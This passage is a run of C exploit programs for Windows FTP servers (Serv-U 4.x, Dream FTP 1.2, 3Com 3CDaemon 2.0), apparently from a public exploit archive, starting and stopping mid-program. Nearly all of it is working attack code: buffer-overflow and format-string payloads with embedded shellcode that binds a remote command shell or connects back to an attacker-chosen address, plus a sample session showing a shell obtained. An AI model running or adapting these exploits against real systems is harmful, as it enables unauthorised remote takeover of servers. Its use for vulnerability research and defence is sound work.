if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] connect()");
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096);
bzero(buff,4096);
readcrap(s);
sprintf(buff,"USER %s\r\n",user);
send(s,buff,strlen(buff),0);
readcrap(s);
sprintf(buff,"PASS %s\r\n",pass);
send(s,buff,strlen(buff),0);
readcrap(s);
bzero(buff,sizeof(buff));
strcpy(buff,"STAT ");
memset(buff+5,0x41,2000);
memcpy(buff+5+0x571-strlen(bsh),&bsh,strlen(bsh));
memcpy(buff+5+0x571,jmpback,strlen(jmpback));
i=offset;
memcpy(buff+5+0x5d9,&i,4);
send(s,buff,strlen(buff),0);
readcrap(s);
free(buff);
close(s);
// -------------------- end of core
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
exit(0);
}
// [2005-02-07]
21 Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\x ff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x 53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x 53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x 53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\x e2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\x e8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\x ff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\x ff";
int sock;
FILE* FILEsock;
int doubling;
void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
for (i=0; i<strlen(arguments); i++) {
send(sock, arguments+i, 1, 0);
if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
}
send(sock, "\x0a\x0d", 2, 0);
}
int main(int argc, char *argv[], char *envp[]) {
struct sockaddr_in addr;
char *outbuffer, inbuffer[256];
char *retaddress = NULL;
char *version = NULL;
if (argc<5) {
printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
exit(-1);
}
printf("- Serv-ME ----------------------------------------------------\n"
" Serv-U v4.x \"site chmod\" exploit.\n"
" Written by SkyLined <[email protected]>.\n"
" Credits for the vulnerability go to ICBM <[email protected]>.\n"
" Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("Socket creation failed");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
perror("Connection failed");
exit(-1);
}
FILEsock = fdopen(sock, "r");
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
printf("[-] This is not a Serv-U v4.X ftp server.\n");
exit(-1);
}
if (strstr(inbuffer, "v4.1") > 0) {
retaddress = retaddress_4103;
version = "4.1.0.3";
}
printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
send_command("USER", argv[3]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
send_command("PASS", argv[4]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "230") != inbuffer) {
printf("[-] Login failed.\n");
exit(-1);
}
if (argv[5]) {
printf("\n[+] Changing directory...\n");
send_command("CD", argv[5]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
}
outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
memset(outbuffer, NOP, exploit_length);
memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
printf("\n[+] Checking if \\xff doubling is nescesary: ");
send_command("SITE CHMOD 477", "-\xff\xff-");
fgets(inbuffer, sizeof inbuffer, FILEsock);
if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
doubling = 1;
printf("Yes.");
retaddress = retaddress_4004;
version = "4.0.0.4";
} else {
printf("No.");
if (retaddress==NULL) {
retaddress = retaddress_4100;
version = "4.1.0.0";
}
}
printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
version, *(int*)retaddress);
memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
printf("\n[+] Sending exploit... ");
send_command("SITE CHMOD 477", outbuffer);
printf("send, you can now try to connect to %s:28876.\n", argv[1]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
close(socket);
printf("\n[+] Done. \n");
}
// [2004-01-30]
21 Dream FTP 1.2 Remote Format String Exploit
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x60"
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\x ff\xff\xff\x89"
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x 31\xdb\x56\x56"
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x 53\x53\x53\x53"
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x 50\x53\x53\x53"
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x 05\xd0\xe8\xdf"
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x 8d\x5f\xe8\xcf"
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\x c2\xfe\xff\xff"
"\x83\xc4\x5c\x61\xeb\x89";
int main(int argc, char *argv[], char *envp[]) {
int sock;
FILE* FILEsock;
struct sockaddr_in addr;
int port = 21;
char buffer[1024];
if (argc<2 || argc>3) {
printf("Usage: %s IP [PORT]\n", argv[0]);
exit(-1);
}
if (argc == 3) port = atoi(argv[2]);
printf("- Nightmare --------------------------------------------------\n"
" Dream FTP v1.2 formatstring exploit.\n"
" Written by SkyLined <[email protected]>.\n"
" Credits for the vulnerability go to badpack3t\n"
" <[email protected]>.\n"
" Shellcode based on work by H D Moore (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
(FILEsock = fdopen(sock, "r+")) == NULL) {
fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
perror(NULL);
exit(-1);
}
printf("\n[+] Connected to %s:%d.\n", argv[1], port);
do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock));
while (strstr(buffer, "220-") == buffer);
printf("\n[+] Sending exploit string...\n");
fprintf(FILEsock,
// Argument 10 points to the SEH handler code, it's RWE so we'll change
// the SEH handler to redirect execution to the beginning of our
// formatstring. When the SEH handler is called [ebx+0x3c] points
// to the start of our formatstring, we just have to jump over the
// formatstring exploit itself to our shellcode:
"\xeb\x29" // Jump over the formatstring exploit
"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n" // Argument 10 -> SEH
"%%n" // Causes exception after SEH adjustment.
"@@@@@@@@" // nopslide landing zone for jump
"%s\r\n", // shellcode
0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
shellcode);
fflush(FILEsock);
close(sock);
printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
" connect to %s:28876.\n", argv[1]);
return 0;
}
// [2004-02-11]
21 3Com Ftp Server 2.0 Remote Overflow Exploit
/* Email fixed brotha /str0ke */
/*
3Com Ftp Server remote overflow exploit
author : c0d3r "kaveh razavi" [email protected]
package : 3CDaemon version 2.0 revision 10
advisory : http://secway.org/advisory/ad20041011.txt
company address : 3com.com
it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
just a lame coded software that didnt cost to bother myself to develop
the exploit code . every command has got overflow .
compiled with visual c++ 6 : cl 3com.c
greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs
Jamie of exploitdev (hey man how should I thank u with ur helps?),
sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh
securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?)
Lamerz :
[email protected] with a ****ed ass ! , konkoor ( will be dead soon !! )
ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! )
/*
/*
D:\projects>3com.exe 127.0.0.1 21 c0d3r secret
-------- 3Com Ftp Server remote exploit by c0d3r --------
building overflow string
attacking host 127.0.0.1
packet size = 673 byte
connected
sending username
sending password
exploit sent successfully try nc 127.0.0.1 4444
D:\projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3Com\3CDaemon>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
// 4 byte return address + 430 byte shellc0de
int main (int argc, char *argv[]){
char shellc0de[] = // some NOPS + shellcode bind port 4444
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x 4A\x33\xC9\x66"
"\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\x EB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x 12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\x ED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\x CE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\x C6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x 5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x 78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x 49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x 65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\x F3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x 59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x 6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\x F3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\x D9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\x C8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\x C8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\x AA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x 7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\x FA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\x EB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\x F8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\x EE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\x D8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\x FA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x 99";
unsigned char *recvbuf,*user,*pass;
unsigned int rc,addr,sock,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
unsigned short port;
char *ptr;
long *addr_ptr;
int NOP_LEN = 200,i,x=0,f = 200;
if(argc < 5) {
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
printf("-------- usage : 3com.exe host port user pass --------\n");
printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
exit(-1) ;
}
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
recvbuf = malloc(256);
memset(recvbuf,0,256);
//Creating exploit code
printf(" building overflow string");
memset(buffer,0,size);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0;i < size;i+=4){
*(addr_ptr++) = address;
}
buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
for(i = 3;i != 235;i++){
buffer[i] = 0x90;
}
i = 239;
for(x = 0;x != strlen(shellc0de);x++,i++){
buffer[i] = shellc0de[x];
}
buffer[size] = 0;
//EO exploit code
user = malloc(256);
memset(user,0,256);
pass = malloc(256);
memset(pass,0,256);
sprintf(user,"user %s\r\n",argv[3]);
sprintf(pass,"pass %s\r\n",argv[4]);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf(" packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf(" connected\n") ;
rc2=recv(sock,recvbuf,256,0);
printf(" sending username\n");
send(sock,user,strlen(user),0);
send(sock,'\n',1,0);
printf(" sending password\n");
Sleep(1000);
send(sock,pass,strlen(pass),0);
send(sock,buffer,strlen(buffer),0);
send(sock,'\n',1,0);
printf(" exploit sent successfully try nc %s 4444\n" , argv[1]);
}
else {
printf("[-] 3CDaemon is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// [2005-02-17]
21 3Com 3CDaemon FTP Unauthorized "USER" Remote BoF Exploit
/* Added " on line 86 /str0ke */
/*
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow
The particularity of this exploit is to exploits a FTP server
without the need of any authorization.
Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
Application Risk: Severely High
Internet Risk: Low
Hole History:
14-4-2002: BOF flaw found by skyrim
15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
17-2-2005: lame exploit released enigmagroup.org/id.php?id=825
18-2-2005: proper exploit released hat-squad.com, class101.org, class101.hat-squad.com
Notes:
-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
-Nice call ebx offset found.
Stable accross Win2k Pro&Srv, SP4's serie, every OS languages.
Greet:
Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com
class101.org
class101.hat-squad.com
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
/*XORED*/
"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x 59\x6C\x59"
"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x 57\x53\x32"
"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\x FF\xFF\xFF"
"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x 0C\x8B\x70"
"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x 8B\x5B\x78"
"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x 53\x51\x52"
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x 34\x8B\x01"
"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x 45\x09\x8D"
"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x 58\x5E\x56"
"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x 88\x01\xF8"
"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\x BE\xFE\x4D"
"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x 89\xC7\x6A"
"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x 8B\x45\x04"
"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x 66\x35\x93"
"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x 53\x53\x56"
"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x 10\x55\x57"
"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\x FF\x55\xEC"
"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x 5C\x63\x6D"
"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x 53\xFE\xCA"
"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\x B1\x08\x53"
"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\x F0\x6A\xFF"
"\xFF\x55\xE4";
char scode2[]=
/*XORED*/
"\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x 0E\xB4"
"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\x B4\xCC\x76\x58"
"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\x B5\x75\xA8\x44"
"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\x B5\x71\x12\xF1"
"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x 73\x74\xD1\x35"
"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\x B8\xD4\xA8\x54"
"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\x EB\xC1\x7E\x55"
"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\x B8\x14\x78\x12"
"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x 62\x16\xE4\x8F"
"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\x B4\x9F\x23\x9E"
"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\x FD\x19\x6A\xAA"
"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x 59\x63\x18\x59"
"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x 63\x16\xFC\x87"
"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x 4B\xCA\x27\x57"
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x 84\xAE\xE3\x5E"
"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x 85\x44\x70\x5D"
"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\x E1\xBB\x70\x59"
"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\x F7\xD2\x67\x0E"
"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\x ED\x6C\x88\x89"
"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x 90\xA3\x22\x0F"
"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x 39\xDB\x07\x1E"
"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x 4B\xEA\x23\x66"
"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\x C1\x9F\x4B\xA3"
"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x 4B\x4C\xDC\x7B"
"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x 4B\x4F\x23";
char payload[1024];
char ebx[]="\x08\xB0\x01\x78";
char ebx2[]="\xB1\x2C\xC2\x77";
char pad[]="\xEB\x0C\x90\x90";
char EOL[]="\x0D\x0A";
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x93939393;
gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x93939393;
gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=21;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP4 Pro. Norsk\n[+] Win2k SP4 Server German\n[+] Win2k SP4 Pro. Dutch\n[+] Etc...";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP1 Pro. English";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,"USER ");
memset(payload+5,0x90,700);
memcpy(payload+5+229,&pad,4);
memcpy(payload+238,target,4);
if (argc==6)
{
memcpy(&scode1[5], &gip, 4);
memcpy(&scode1[3], &gport, 2);
memcpy(payload+253,scode1,sizeof(scode1));
}
else memcpy(payload+253,scode2,sizeof(scode2));
strcat(payload,EOL);
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
